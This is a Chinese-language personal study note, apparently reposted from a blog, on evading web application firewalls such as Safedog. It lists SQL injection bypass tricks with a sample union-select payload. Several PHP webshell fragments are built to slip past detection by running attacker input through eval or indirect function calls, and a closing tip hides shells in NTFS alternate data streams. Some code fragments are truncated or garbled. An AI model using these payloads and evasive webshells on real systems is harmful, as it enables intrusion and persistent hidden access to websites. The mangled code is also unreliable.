bypass绕WAF
注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!
WAF:
web应用防护系统(网站应用级防御系统)
waf会拦截恶意传参,但并不是所有的拦截都是waf干的
硬件waf、软件waf、云waf
WAF检测机制的核心就是正则表达式
测试环境
系统:win2008R2
最新版安全狗:
一、常见绕WAF手法
Bypass SQL
大小写绕过(很老的waf才有用)
替换绕过
特殊字符绕过(%0a换行) \sleep() \updataxml()
编码绕过(利用检测机制的不同,通过编码绕过)
等价替换(利用其他函数替换
注释 数据库中是注释的意思
内联注释 当数据库版本大于5001执行
容器特征(apche的hpp、或者是iis的%分割)
iis传参里面 s%e%l%e%c%t => select
apche参数污染,传两个参数,以后一个参数为准
id=phpinfo()
白名单(管理员权限或者是127.0.0.1本地不拦截、文件后缀名)
缓冲区(数据太多超过waf检测范围)
安全狗一般检测4000个
?id= 1 union select 1,2,3,4
二、绕WAF写码
Bypass webshell
非常的难以置信,这个竟然没有拦截
4、变量覆盖绕过
$$d($_REQUEST[8]); ?>
函数绕过
魔术方法绕过
name"); } } $user = new User(); $user->name="$_REQUEST[8]"; ?>
类方法绕过
foreach($COOKIE as $key=> $value){
if($key=='eval'){
$key($REQUEST[8])
}
}?>
内置函数
$a=get_defined_functions();
$a[internal][841]($_REQUEST[1])
?>
绕WAF终极手法,连接外部数据库hjw,获取info表中的第一行数据eval($_REQUEST[8])
eval(mysqli_fetch_assoc(mysqli_query(mysql_connect('127.0.0.1','root','root','hjw123'),'select * from info'))['info']) //键为info的地方
?>
拿到shell之后藏shell的妙招ntf文件流
一、echo "" >> /:123.txt
二、
来源地址:https://blog.csdn.net/qq_58000413/article/details/127524510
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341